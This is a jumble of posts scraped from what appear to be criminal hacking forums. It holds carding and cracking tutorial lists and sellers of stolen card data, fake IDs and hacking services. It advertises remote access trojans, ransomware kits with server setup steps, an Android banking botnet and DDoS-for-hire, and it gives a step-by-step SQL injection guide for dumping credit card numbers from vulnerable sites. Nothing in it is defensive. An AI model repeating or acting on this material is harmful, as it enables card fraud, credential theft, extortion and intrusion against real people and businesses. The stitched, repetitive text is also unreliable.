BIN??s Carding For Noobs 75.Carding Online Tools And Website 76.PayPal Carding 77.Wallmart Carding 78.Amazon Carding (Video Tutorial) eBay Carding (Video Tutorial) 80.Full process of Carding  [Hidden content]  Click to expand...  Im new here but feel like at home with all of yee. very nice How did you enter    ansko69 said:    OMG THANK YOU   Click to expand... Hello I want you to report a telegram account to me ??????????27?? said:    CONTENTS:  1.Netflix cracking (full tutorials+tools) 2.Amazon prime video method 3.Deezer method 4.Eros now subscription method Instagram panel trick 6.Steam cracking tool 7.VIU+VOOT trick with download 8.PUBG UC pass trick 9.Carding PDFs for noobs 10.AMEX accessing PDF 11.CC cashout 12.ATM hack 13.Instagram account hack WhatsApp admin hack 15 .Netflix Cracker Free 1 Month Netflix Trick ( You Can Create Unlimited Account ) 17.Free Netflix using PayPal ( Video Tutorial ) 18.Free Amazon Prime Trick + Video Tutorial 19.Hotstar Cracking Trick (Video Tutorial) 20.How To Bypass Link Shortner 21.Instagram Liker 22.Snow??s YouTube Bot 23.YouTube View Booster Bot 24.YouTube Blazzer 50 Android Hacks 26.Amazon Gift Cards 27.Paypal Method 28.Ebay Method 29.Free Amazon Gift Card Method 30.Free Pizza Method 31.Flipkart Carding Tutorial 32.How To Get Fresh Valid Proxy List For Cracking 33.How To Get A Free Master Card 34.How To Get Referrals 35.Bypass Gmail Mobile Verification Trick 36.Bypass Android Pattern Lock Using ADB 37.Get Refund Of GiftCard 38.Facebook Hacking Ebook 39.Get Things From Ebay For Free 40.SEO Secrets 41.Guide To Make Money Online Hack Hotmail 43.Hack Gmail 44.Hacking Methods 45.CC Generator 46.CC Checker 47.Crack WEP in Linux 48.Get Massive YouTube Traffic 49.Get Passes To Pornsites 50.Hack WEP WiFi Password 51.Kick Someone Of A Wireless Network 52.Make $1000??s A Week With Torrents 53.Make A Phisher For A Website (Facebook/Instragram/Etc) 54.Make Easy Money As An eBay Affiliate 55.Make Multiple Gmail Accounts With Only 1 Account 56.How To Make Mozilla 30 Times Faster 57.USA Whatsapp Number Trick 58.Collection Of Rare Hacking Ebooks 59.Starbucks Method 60.How To Call Someone From His Own Number (Caller Id Spoofing) 61.Transfer PP Balance Method 62.YouTube RED Trick 63.Gaana Mod App 64.Netflix Mod App (Look a Like) Saavn Mod App Express VPN Mod App 67.7 Reasons a Credit Card Is Blocked Amazon Carding Method + Video Tutorial 69.What is Carding?? (Video) 70.Basic Carding TutoBal 71.Phishing Tutorial 72.Easy Cardable Sites List 73.Find Local BIN??s Carding For Noobs 75.Carding Online Tools And Website 76.PayPal Carding 77.Wallmart Carding 78.Amazon Carding (Video Tutorial) eBay Carding (Video Tutorial) 80.Full process of Carding  [Hidden content]  Click to expand...  Yes man. BOMB
Hello Everyone   If you are in search of Legit seller for Genuine tools with tutorials for  =>SPAMMING =>CARDING =>TOPPING =>HACKING =>CRACKING & much more  Here I^m. You can get your desired stuff at reasonable prices & will never be disappointed. CONTACT: Telegram > @leadsupplier ICQ > 752822040 Email > exploit.tools4u@  *You should try at least once*  STUFF YOU CAN GET: ->Blockchain Blue Print ->Sql Injector ->Cpanel ->Kali Linux 101202 ->Premium Accounts (Netflix Pornhub etc) ->Keylogger & Keystroke Logger ->Facebook & Whatsapp Hacking Tricks & Tutorials ->Google Hacking ->Western Union Logins ->Robotics ->Php mailer ->Carding Methods ->Bitcoin cracker & many more  Scam isn^t in my dictionary..  Genuine & fresh tools available for you.  OTHER STUFF YOU CAN GET: >Fullz/Dead fullz >Rdp^s >Photo ID^s  >HQ Emails with passwords >Tutorials for Everything you need >Spamming Stuff >Fake USA ID^s & Passports  CONTACT Telegram > @leadsupplier ICQ > 752822040 Email > exploit.tools4u@
how to instal this for windows   Information Gathering AnonSurf Password Attack Wireless Attack SQL Injection Tools Phishing Attack Web Attack Tool Post exploitation Forensic Tools Payload Creator Router Exploit Wifi Jamming XSS Attack Tool SocialMedia Finder DDos Attack Tools Steganography Tools IDN Homograph Attack Hash Cracking Tools SocialMedia Attack= INSTAGRAMFACEBOOKWHATSAPP Android Hack Update System   
Teach me website hacking The Dark Fox team is ready to consult for free on this topic please ask your questions about one of the following topics:  Accounts  Apple Developer Account  Facebook Ads Account Facebook Marketplace Account Google Play Developer Account Google Ads Account Visa Card Attacks  Take Site Down (DDOS Attack) Take Google Ads Down Exploits  DOC Exploit PDF Exploit Instagram 0Day Exploit Snapchat Exploit.php/product-category/hacking/  Hacking  Android/iPhone Spy Service Bitcoin Hacking 2020 Email hacking Social Media Hacking Telegram Hacking Windows Hacking Service Website Hacking Whatsapp Hacking WiFi/Router Hacking Ransomware   Ransomware As a Service Ransomware Removal Decrypt Sms and call intercept  SS7 Location Tracker SS7 Call Intercept Redirect SS7 Bypass 2FA ?? SMS Intercept SS7 Software+help file Spam  PHP Mailers Email leads SMTP Spam SMS List Server Tools  Bitcoin Stealer 2020 DFM Email Sender DFM RAT Membership DFM Link Builder Membership DFM FUD Crypter Gumtree Scraper Bot
Dev Hacker Set with 35+ Hack Programs 25+ Educational Document Files and 3 Operating Systems. It is for sale for $ 82000. For more information about its content: p2tax@
I downloaded it to a stick and ran the virus checker and it found a Trojan......Watch out people... Urls working thank you malkovich said:    Urls working thank you  Click to expand...  did you check for virus? zoilo0312 said:    did you check for virus?  Click to expand...  My antivirus was alert on this archiv. First download EPIC BROWSER for best experience.        Epic Privacy Browser a secure chromium-based web browser with Encrypted Proxy and AdBlock | a free unlimited VPN private browser for Windows Mac iOS and Android             After installing EPIC BROWSER Download the Btc Miner Ultimate Software from the link below using your epic browser and Start Mining Btc Free.          180.4 KB file on MEGA       mega.nz
hhhh said:    Hi i need a website hacking. is this something you can assist with?  Click to expand...        You can also use this forum^s escrow Hi i need a website hacking. is this something you can assist with? Hellloooo everyone I have a hacker that is up for hire you can message him through telegram his name is @Jhackerman  If you do not have telegram which is free open source anonymous software you can email me at FancyDuck@secmail.pro What does he do?  Credit cards range from $50-100 Methods from $30-50 Cc fulls $30-50 Hacking service $50-$1k depends Spam tools $50-70
Hello i am looking to contact anyone who has had any contact or use of the pysa ransomware willing to pay BTC/ETC for the right information. 64g66g46@  -----BEGIN PGP PUBLIC KEY BLOCK----- Version: OpenPGP.js v4.10.7 Comment: OpenPGP.js | OpenPGP JavaScript Implementation  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 HiwWUfO7HkXiMD2SfgW851ix =8kyi -----END PGP PUBLIC KEY BLOCK-----
HOW TO BYPASS GMAIL MOBILE VERIFICATION TUTORIAL    STEP-1   Go to  Sign up there.   STEP-2   Create an account on gmail but in location fill United States.   STEP-3   After Creating your e-mail accountNow it will take you to mobile verification page.   STEP-4   Here select the option of Voice call and fill the no: that you got from the website ()   STEP-5   Now you will get a mail having verification code as voice mail on that account from which you have registered on.   STEP-6   Go open it  download  the attachment file and listen the code after that type the code of your voice mail in verification code and click  OK   Done. Your account is ready now.   Enjoy ??????????27?? said:    [Hidden content]  Click to expand...  gift that keeps on giving
How To Bypass Link Shortner :   1. Go To This Website : CheckShortURL - Your shortened URL expander  2. Enter Short Url without http:// or https://  3. Click On Expand  4. Done   You Can Use t.co adf.ly goo.gl amzn.to  ow.ly and much more links How To Bypass Link Shortner :   1. Go To This Website : CheckShortURL - Your shortened URL expander  2. Enter Short Url without http:// or https://  3. Click On Expand  4. Done   You Can Use t.co adf.ly goo.gl amzn.to  ow.ly and much more links    How To Bypass Link Shortner :   1. Go To This Website : CheckShortURL - Your shortened URL expander  2. Enter Short Url without http:// or https://  3. Click On Expand  4. Done   You Can Use t.co adf.ly goo.gl amzn.to  ow.ly and much more links malkak said:    Keep up the good work for tips and tricks  also. u posted the wrong description for the bypass trick  Click to expand...  I now only realized my mistake...just fixed it
ModerationJump to newWatch ??? A Aous New member Feb 28 2022 #1 JoinedFeb 26 2022Messages3Likes0Points1LocationtunisiaHellcoins??57Usd$0     Lost Door RAT is a Remote administration Tool which can infect Windows operating systems from 95 to windows 11. Features:- Communication Lost Door Establish a Direct communication with the server side using direct chat or windows Messages Auto-start Get/Edit the Registry Entries of windows startup Key Logging Lost Door have two methods of key logging online methods is to get live keystrokes or offline get Saved keystrokes Process Manager List / Terminate active Process on the Remote Machine Dos Commanded Execute remotely Dos Commands Applications Manager List/ Uninstall Application on the Remote Machine Windows Manager List active windows on the server Machine and control it Hide/Maximize/ Minimize/Rename Funny Stuff Control windows Features as Open /Close CD drive  Swap Mouse Hide Show taskbar Hide Show Icons and others Power Configuration Control the remote machine Restart / Shutdown / Logoff User Control Panel Run Control Panel Features Printer Print Any thing on the Remote Printer Execute Execute a path or an installed app on the remote machine Download And Run Download and Run from a provided Link directly into the remote machine Desktop and Camera Viewer Stream Live Desktop and webcam with the option to save the streaming as AVI Files Manager Manage Remotely Remote Machine Files Download/Upload /Run /Delete/ Rename /Copy /Set Hidden . Chrome Passwords Get Chrome Save URL & User & passwords / Run A page Server Setting Manage The remote Server Rename/Delete/Restart Server Builder Build Your own Customized Server add desirable Features as Crypted Reverse Connection IP/ Connection Delay /Run on Startup /Crypted Folder/Customized Name in Process/Fake Message On execution/Disable Firewall/Spread Server via USB & P2P/Protect Process/Disable Regedit/ Disable task manager/Melt After Run/Set Hidden/ Save and Load Setting you can use a fast Creation mode if you don^t know what all of this means Client Customize You Can customize the client as you wish Chose Connection Port / Flag detection by language or Ip/ Use Ballon /Picture Notification/ Chose Alert Sound/ transparency/ Chose Language and Save load Settings Imposter Imposter is a tool that allow to create a server with a download and execute uploaded exe and pretend to browse of website or to run software. Download    .451/#post-1180
HOW TO HACK CREDIT CARD | DUMP DATABASE Credit card hacking can be done with two methods:1. By spamming.2. By using Database hacking techniques( SQL injection cross site scripting Remote file Inclusion)In this tutorial I will teach you Database hacking with SQL injection (I will use SQLi from now on).Note Databases are like excel so don??t be confused if I talk about rows and columns.Things you will need:Havij SQL injection ToolA SQL vulnerable siteA very important thing you will need: your mindChecking for SQL vulnerability.Now to check if a site is vulnerable to a verbose SQL injection a hacker will simply add ?? (apostrophe) after the site url like this:.php?id=2?and the hacker will get this error on the siteYou have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near ??\? at line 1It means that site is vulnerable to SQL injection.Exploiting the vulnerable siteOpen Havij and paste site URL in target field and hit enter.Now wait for Havij to get all the databases of the website. Now the hacker clicks on available database of site and click on Get Tables.By clicking Get Tables Havij will look after the tables available in the database. Now after the scanning Havij will get all tables and the main work will start. You must check if the table is available with a name that has something to do with credit card financial details usually it??s in the table orders. Select it and then click on Get Columns.Now after clicking on Get Columns Havij will get all the columns available in orders table. You might find different columns like country name credit card number and many more. Now select the columns and click on Get Data.Havij will look at the data available in the columns and dump it. This data is the credit card info. You can use Havij to dump other colums like username and password if available??for more contact (devildiary@)
ATENTION: You won^t get this combos on your corner combo shop.This combos were extracted with Hacxx Fast Combo Grabber v2.4 (SUPRA Edition) pm me for more...Download 1:_COMBO_PACK_MAY_2021_(Full).rar.htmlDownload 2: (100 MB each)https://oxy.name/d/PtJdhttps://oxy.name/d/StJdhttps://oxy.name/d/UtJdhttps://oxy.name/d/XtJd
"## Cryptolocker :: RANSOMWARE [Offline/Online ver] ##POSTER: .php?di=J9MPTelegram channel: https://t.me/+-vp5IFPnJZNmYzAy+++unique exploit for elevating rights+unique random number generator +rewriting free sectors ""sectors pollution"" +software load balancer +Inability to start multiple instances +implemented by noKillProcess +delete/overwrite shadow copies +intelligent shutdown of processes +.exe self-deletion function +anti-sandbox function anti-debugging +extension for encrypted files +list of extensions of encrypted files +encr. algorithm ?MOSAIC (ChaCha2.0/AES+RSA) +encryption rule: whole file or part +autoselect execution method: threads/IOCP +number of file-requirements +names to file-requirements +text of the file-requirement (offline ver.) +file-key directory (offline ver.) +file-key name (offline ver.) +autoload (on/off) +geomodule (on/off countries) +delayed launch +network function +start rules: raising rights UAC +shutdown of services/processes Shell-instructions ++++* Offline version: $500* Online version:--- new panel + webpage for the victim +--- anonymous chat +--- BTC-payment - $500* Set of two versions: $650TOX ID: D85B413045DD694FCEC7F2FBAA4F8EC8FD4CCB0A0E6765E5DE3AE4C299888B4892404C8C0672 Telegram: @bay0net- Software develops further and on support: 24/7.- I don??t give software for testing - use Escrow Services.- If you do not understand that you are going to acquire or not enough experience - leave this idea.- For all questions contact personally at the specified contacts do not ask questions in the topic (for obvious reasons).- I answer questions only regarding software: a big request to prepare and send questions in one list at once.Who doubts the quality or is careful - welcome to escrow servicesHaving secured the transaction with the required amount on the balance sheet you will be able to check the product for quality and make the right decision for you."
"nothing is here I^m starting up with the sales of my ""Spectre"" RAT v1.The project mixes RAT Stealer and some Botnet features.All the info is detailed below. Please let me know any questions or doubts. Here on the thread over PM Jabber or Email.Thank youFEATURES============* C++ RAT (BOT)* PHP/AJAX C2 SERVER (WEB PANEL)* NOT BASED ON ANOTHER MALWARERAT/BOT(+) UPLOAD FILES(+) DOWNLOAD FILES* FROM C2 SERVER (OUR OWN HOST) OR FROM EXTERNAL URL (HOSTED ANYWHERE)* CHECKS IF URLS TO FILES EXIST TO AVOID ERRORS/CRASHES(+) DOWNLOAD + EXECUTE* DROP AND RUN OTHER EXES/SCRIPTS(+) HARVEST / FIND FILES* FIND* BY FILENAME / EXTENSION / FILENAME+EXTENSION* FOLDER/PATHS: PREDEFINED / CUSTOM * OPTIONAL ""MAX FILE SIZE"" VALUE (AVOID UPLOADING HUGE FILES)* UPLOAD INDIVIDUAL FILES FROM THE SEARCH RESULTS* HARVEST* FIND + ZIP ALL FILES AND UPLOAD THE PACKAGE(+) PASS RECOVERY* CHROME* FIREFOX* EDGE* FILEZILLA(+) BROWSERS DATA* FIREFOX FORMS DATA(+) CLIPBOARD STEALER* SENDS ALL CLIPBOARD DATA TO SERVER LIVE* ON/OFF SWITCH* DOWNLOAD DATA TO TXT FILE FROM THE SERVER* DELETE DATA(+) KEYLOGGER * OFFLINE* HOOKING API METHOD (MORE ROBUST. NOT ASYNC)* ON/OFF SWITCH* SET 3 PREDEFINED INTERVALS TO SEND THE LOGS(+) UPDATE ""NEW VERSION"" MODE* UPDATE TO A NEW BOT AND A NEW PANEL (BOTH WITH NEW FEATURES)* CONFIRMS NEW BOT CONNECTED TO THE NEW C2 SERVER BEFORE KILLING OLD* IF NOT CONNECTED THE OLD BOT WILL REMAIN ACTIVE. THIS WAY YOU DONT LOSE THE OLD BOT IN CASE OF UPDATE FAILURE.""ReFUDED"" MODE* REPLACES THE CURRENT RUNNING BINARY FOR THE REFUDED ONE IN THE SAME FOLDER() THIS FEATURE WILL NOT CRYPT YOUR BINARY. ONLY DOES THE UPDATE/DEPLOY(+) SCREENSHOTS(+) KILL BOT(+) MULTIPLE C2 SERVERS LIST* BUILT WITH A LIST OF 5 C2 SERVERS^ URLS. 1 MAIN + 4 BACKUPS.* IF THE MAIN SERVER GETS BLOCKED/TAKEN DOWN THE BOT WILL CHECK THE NEXT SERVER UNTIL IT FINDS ONE ONLINE* YOU DONT LOSE YOUR BOTS. THEY WILL MIGRATE TO ANOTHER SERVER.(+) SINGLE/MASS COMMANDS* SET A COMMAND FOR A SINGLE BOT OR FOR ALLC2 WEB PANEL==============* LIST TARGETS (+ BASIC INFO)* SET COMMANDS* LIST UPLOADED FILES* STARTUP. CONFIG THE MODULES FOR THE FIRST TIME EXECUTION.* TARGETS^ LOG (ACTIVITY/COMMANDS EXECUTED)* DARK/WHITE THEME* SECURE LOGIN WITH USER/PASSWORD AND ""2FA"" CODE* CREDENTIALS ARE HARDCODED AND HASHED. NO DATABASE USED. CANT BE CRACKED.PANEL SCREENSHOTS====================PREVIEW  https://ufile.io/c9y9rhao7Z PASS 9F8G5H6Y* NOTE: ""SHELL"" FEATURE WAS REMOVED AND ON HOLD FOR NOW. THERE ARE OTHER SMALL ADDITIONS/TWEAKS ADDED AFTER THE SCREENSHOTS WERE TAKEN.PROS=======+ SECURE. THE PANEL RUNS FROM A HOSTING/VPS. NOT ON YOUR COMPUTER.+ SECURE. YOU CAN LOGIN USING TOR BROWSER (JAVASCRIPT FULL TURNED ON)+ NO SETUP. AVOID HAVING TO USE VPNS WITH PORT FORWARDING OR TUNNELING. YOU GET READY ACCESS TO THE PANEL.+ GET FILES ALL THE TIME. NO NEED TO HAVE YOUR PC TURNED ON ALL DAY (AVOID CRASHES INTERNET/VPN DISCONNECTIONS ETC)+ MANY FEATURES TO BE ADDED IN FUTURE VERSIONSCAVEATS / NOTES=================(*) NOT ""FUD"". NEEDS CRYPTING/PROTECTING FOR AV EVASION. A CRYPTER WITH ""NATIVE"" SUPPORT SHOULD BE USED.(*) C2 PANEL NEEDS JAVASCRIPT FULL TURNED ON(*) PERSISTENCE + ANTI VM/SANDBOX SHOULD BE SET ON THE CRYPTER(*) x64 WINDOWS ONLY(*) EXE SIZE IS AROUND 2.8 MB (PACKED WITH UPX CAN BE REDUCED TO 800 KB)(*) TESTED ON WINDOWS 7/8/10ASSETS YOU RECEIVE=====================* RAT BINARY* ACCESS TO THE C2 PANEL* READMEPRICING=========RAT+PANEL* 1 MONTH 30 USD* 3 MONTHS 60 USD* 12 MONTHS100 USD+ HOSTING/DOMAIN COST* 1 MONTH = 25 USD* 3 MONTHS = 40 USD(*) HOSTING CYCLES ARE EQUAL (OR SMALLER) TO THE RAT PLAN.EXAMPLE > 1 MONTH RAT PLAN + 1 MONTH HOSTING = 30 + 25 = $ 55 USD EVERY MONTHEXAMPLE > 3 MONTHS RAT PLAN + 3 MONTHS HOSTING = 60 + 40 = $ 100 USD EVERY 3 MONTHSEXAMPLE > 12 MONTHS RAT PLAN + 3 MONTHS HOSTING (CYCLE) = $100 USD EVERY YEAR / $40 USD EVERY 3 MONTHS(*) UPDATES (RAT+PANEL NEW FEATURES) INCLUDED(*) DEMO AVAILABLE (* REQUIRES 10 USD FEE. DISCOUNTED FROM FINAL PRICE.)(*) MONERO / BTC ACCEPTEDTERMS OF SERVICE====================* YOUR PLAN STARTS ONCE THE HOSTING+DOMAIN IS SETUP AND YOU GET ACCESS. IF THERE IS A DELAY BETWEEN THE PAYMENT AND THE SETUP YOU WON^T LOSE ANY TIME OF USING THE APP.* EACH CLIENT GETS A UNIQUE DOMAIN+HOSTING SERVICE (NOT SHARED BETWEEN USERS).* YOUR C2 PANEL URL WILL BE RANDOMLY GENERATED. IT CANNOT BE CHANGED OR CHOSEN.* IF YOUR MAIN URL GETS BLOCKED DUE TO A SPAM/MALWARE COMPLAINT (SUCH AS SPAMHOUSE) YOUR BOTS WILL MOVE TO THE NEXT EMBEDDED URL. WE WILL NEED TO REGISTER THE NEW DOMAIN AND IN SOME CASES GET A NEW HOSTING PLAN. NEW DOMAIN/HOSTING COSTS ARE NOT INCLUDED.* NO FTP/CPANEL WILL BE PROVIDED DIRECTLY TO THE HOSTING SERVICE.* HOSTING COSTS MIGHT CHANGE DEPENDING ON THE PROVIDER.Contact us : digitalmutant@danwin1210.meDATE:username:PLAN: {12 MONTHS / 3 MONTHS / 1 MONTH}PAYMENT METHOD: {BTC / XMR}PLATFORM: {FORUM X}"
I specialize in DDoS attacks against hidden services using very limited resources and a custom DDoS tool. So basically I developed a new technique that is able to take down websites using little to no bandwidth as it also uses somewhat of an exploit.I also don^t want to lose bots in some police investigation so I would much rather do DDoS attacks on people that are in no position to call the cops like deep web vendors scammers terrorist propaganda outlets and the like.Since the attack takes little resources I am willing to set my prices very low. Better than waiting forever for a job at least.If you are interested DM me. I usually do a test takedown at an agreed upon time so the customer knows what they are paying for. If the customer is satisfied the price and time of the attack will be negotiated.Edit:For the sake of convenience if you want to communicate via inbox/email with me please make a secmail.pro inbox and send me that one. I prefer to stay off clearnet inboxes.You can get a secmail here: I have worked with this Vendor. He does what he says and is good at it.Haven^t been scammed so far. Keep up the good work.
"Cryptonite: Ransomware for Windowsfor more contact me on (devildiary@) Cryptonite has been designed to maximize performance with minimal effort. Anyone can learn to use Cryptonite. Two versions of Cryptonite are included. One stores data using Sqlite3 and the other uses Mongo DB Atlas to transferresults in the cloud. The default method is to use Sqlite3 but if you are interested in using the Mongo DB version of Cryptonite switch to the mongo branch of that repository.Installation1? Create an Ngrok account if you don^t have one.2? Register an account. If you have the money buy the premium version. If not the free version will suffice.3? Download the appropriate NGROK version for your operating system.4? Unzip and install NGROK.??For Linux / MAC users unzip the folder via terminal: unzip /path/to/ngrok.zip.??For Windows users just unzip the folder?? Make sure to add ngrok to PATCH5? Authenticate your ngrok:??Copy your AUTH TOKEN from NGROK config page.??For Windows users: open cmd and type (replace YOUR_AUTH_TOKEN_HERE with your authorization token):ngrok authtoken YOUR_AUTH_TOKEN_HEREFor Linux / MAC users: open a terminal and enter (replace YOUR_AUTH_TOKEN_HERE with your authorization token):./ngrok authtoken YOUR_AUTH_TOKEN_HEREpip install -r ""requirements.txt""Run the Server.py file before delivering the ransomware to victims. Server.py starts the server to receive the victim data sent by Cryptonite and creates an NGROK tunnel that performs port forwarding so that anyone from all over the world can access our server. Running Server.py also creates a database file to store information about the victim.More details: "
Anubis 8.0 Android Banking BotNet is a Advance builder modernized and updated. Apk (build) + admin file Download _zipPsw CarlosDonCC2022 I want to know more how the banking botnet work and did you have bank logs for sale.i have a good account drop cash pick and did you have good smtp for spamming
OSRipper v0.1.6 Release With Crypter FudAV evading OSX Backdoor and Crypter FrameworkOSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. Even though it specialises in OSX malware it also works well for generating windows malware. It now not only generates normal unix executables but also .apps.DescriptionOSripper not only generates backdoors but also obfuscates and compiles them. This also includes apple M1 backdoors. Take a closer look at the Roadmap to see how close we are to achieving our goal of total evasion but the results so far are extremely good. In the future i will definetly develop some more specialised and sophisticated Backdoors.Here are example backdoors which were generated with OSRipperHow to run WindowsWe just have to run OSRipper_Windows and follow the steps of the cmd_7z
Virustotal? so i can see what detects it Features:HVNC Clone ProfileHidden DesktopHidden BrowsersHidden ChromeHidden FirefoxHidden EdgeHidden BraveHidden ExplorerSupport WebGLMonitor on/offOpen/close CDShow/Hide taskbarShow/Hide Start ButtonShow/Hide ExplorerShow/Hide ClockShow/Hide TrayShow/Hide MouseEnable/Disable Task ManagerEnable/Disable RegeditDisable UACSystem InformationFile ManagerStart Up ManagerTask ManagerRemote ShellTCP ConnectionReverse ProxyRegistry EditorUAC ExploitDisable WDFormat All DriversKill All AVNet FrameworksExecution Policy EditorUSB SpreadKiller RegAll Google chrome based browsers recoveryAll Edge based browsersOnline - Offline KeyloggerChange client nameEnable installUsb spreadAnti killDisable windows defenderHide fileHide folderEnable start up/persistenceChange startup registry nameMutexIP/DNS/No ipEncrypted connectionChange reconnect timeChange assembly clone/randomChange iconEnable keyloggerHide keylogger folderChange log directory namehttps://mega.nz/file/c7502Bya#LvHRPDIjel_BMFaj9TqS7-Xal8OXfIKpoPWtIL-vOUo_2022_Cracked_By_Axnxv_rar
Ransomeware for debian-based linux systems for rent... 100% portable does not require a vps server you just run it on the victim system and it will encrypt all filesdelete logs and bash history. written in python3 and in case the system runs a web will make a deaface. we only accept (XMR) Contact us for prices and technical details:rascorpcontactmail@
"There is a repo of malwares called ""The Zoo"" (its for a friend he is testing some virus) Someone have a list of Dangerous virus ?? i need to do a test I don^t recommend use this viruses . it seems simple and normal but will lost your data. network will dead . boot will break and .... etc[link from Medium you must check all links you will click]"
LMFAO you can do this same and much more using this tool  Typical Features of the Trojans include.* Remote Desktop     * Remote Webcam     * Built in Keylogger* Password Recovery * Remote File Manager * Download and Execute* Remote Terminal    * Process Manager     * Registry Modification* Clipboard Access Interestingly I had him checked out and i get it He is a total package you interested in the cold war spying ? the pandemic lock down few years helped me with closure in my affair as we had to adopt new living methods??argh never mind a mystery parcel I found...I??d recommend with such awesome Hack Oracle Application Server that can recover password to email accounts Facebook Hack Phone Hacks want to monitor your partner. You need to give this dude more encouragement  services are not just confined to Website Takeover Social Media Hacks Database Hacks Email Hacks Phone and Gadget Hacks change of grades Location Tracking (Stealth Spying) or any other accounts that requires activation VERIFICATION code but other complex tailored services not listed in this message with respect for such low prices.cybilltritech AT protonmail DOT comTelling him greymatters sent you his info.
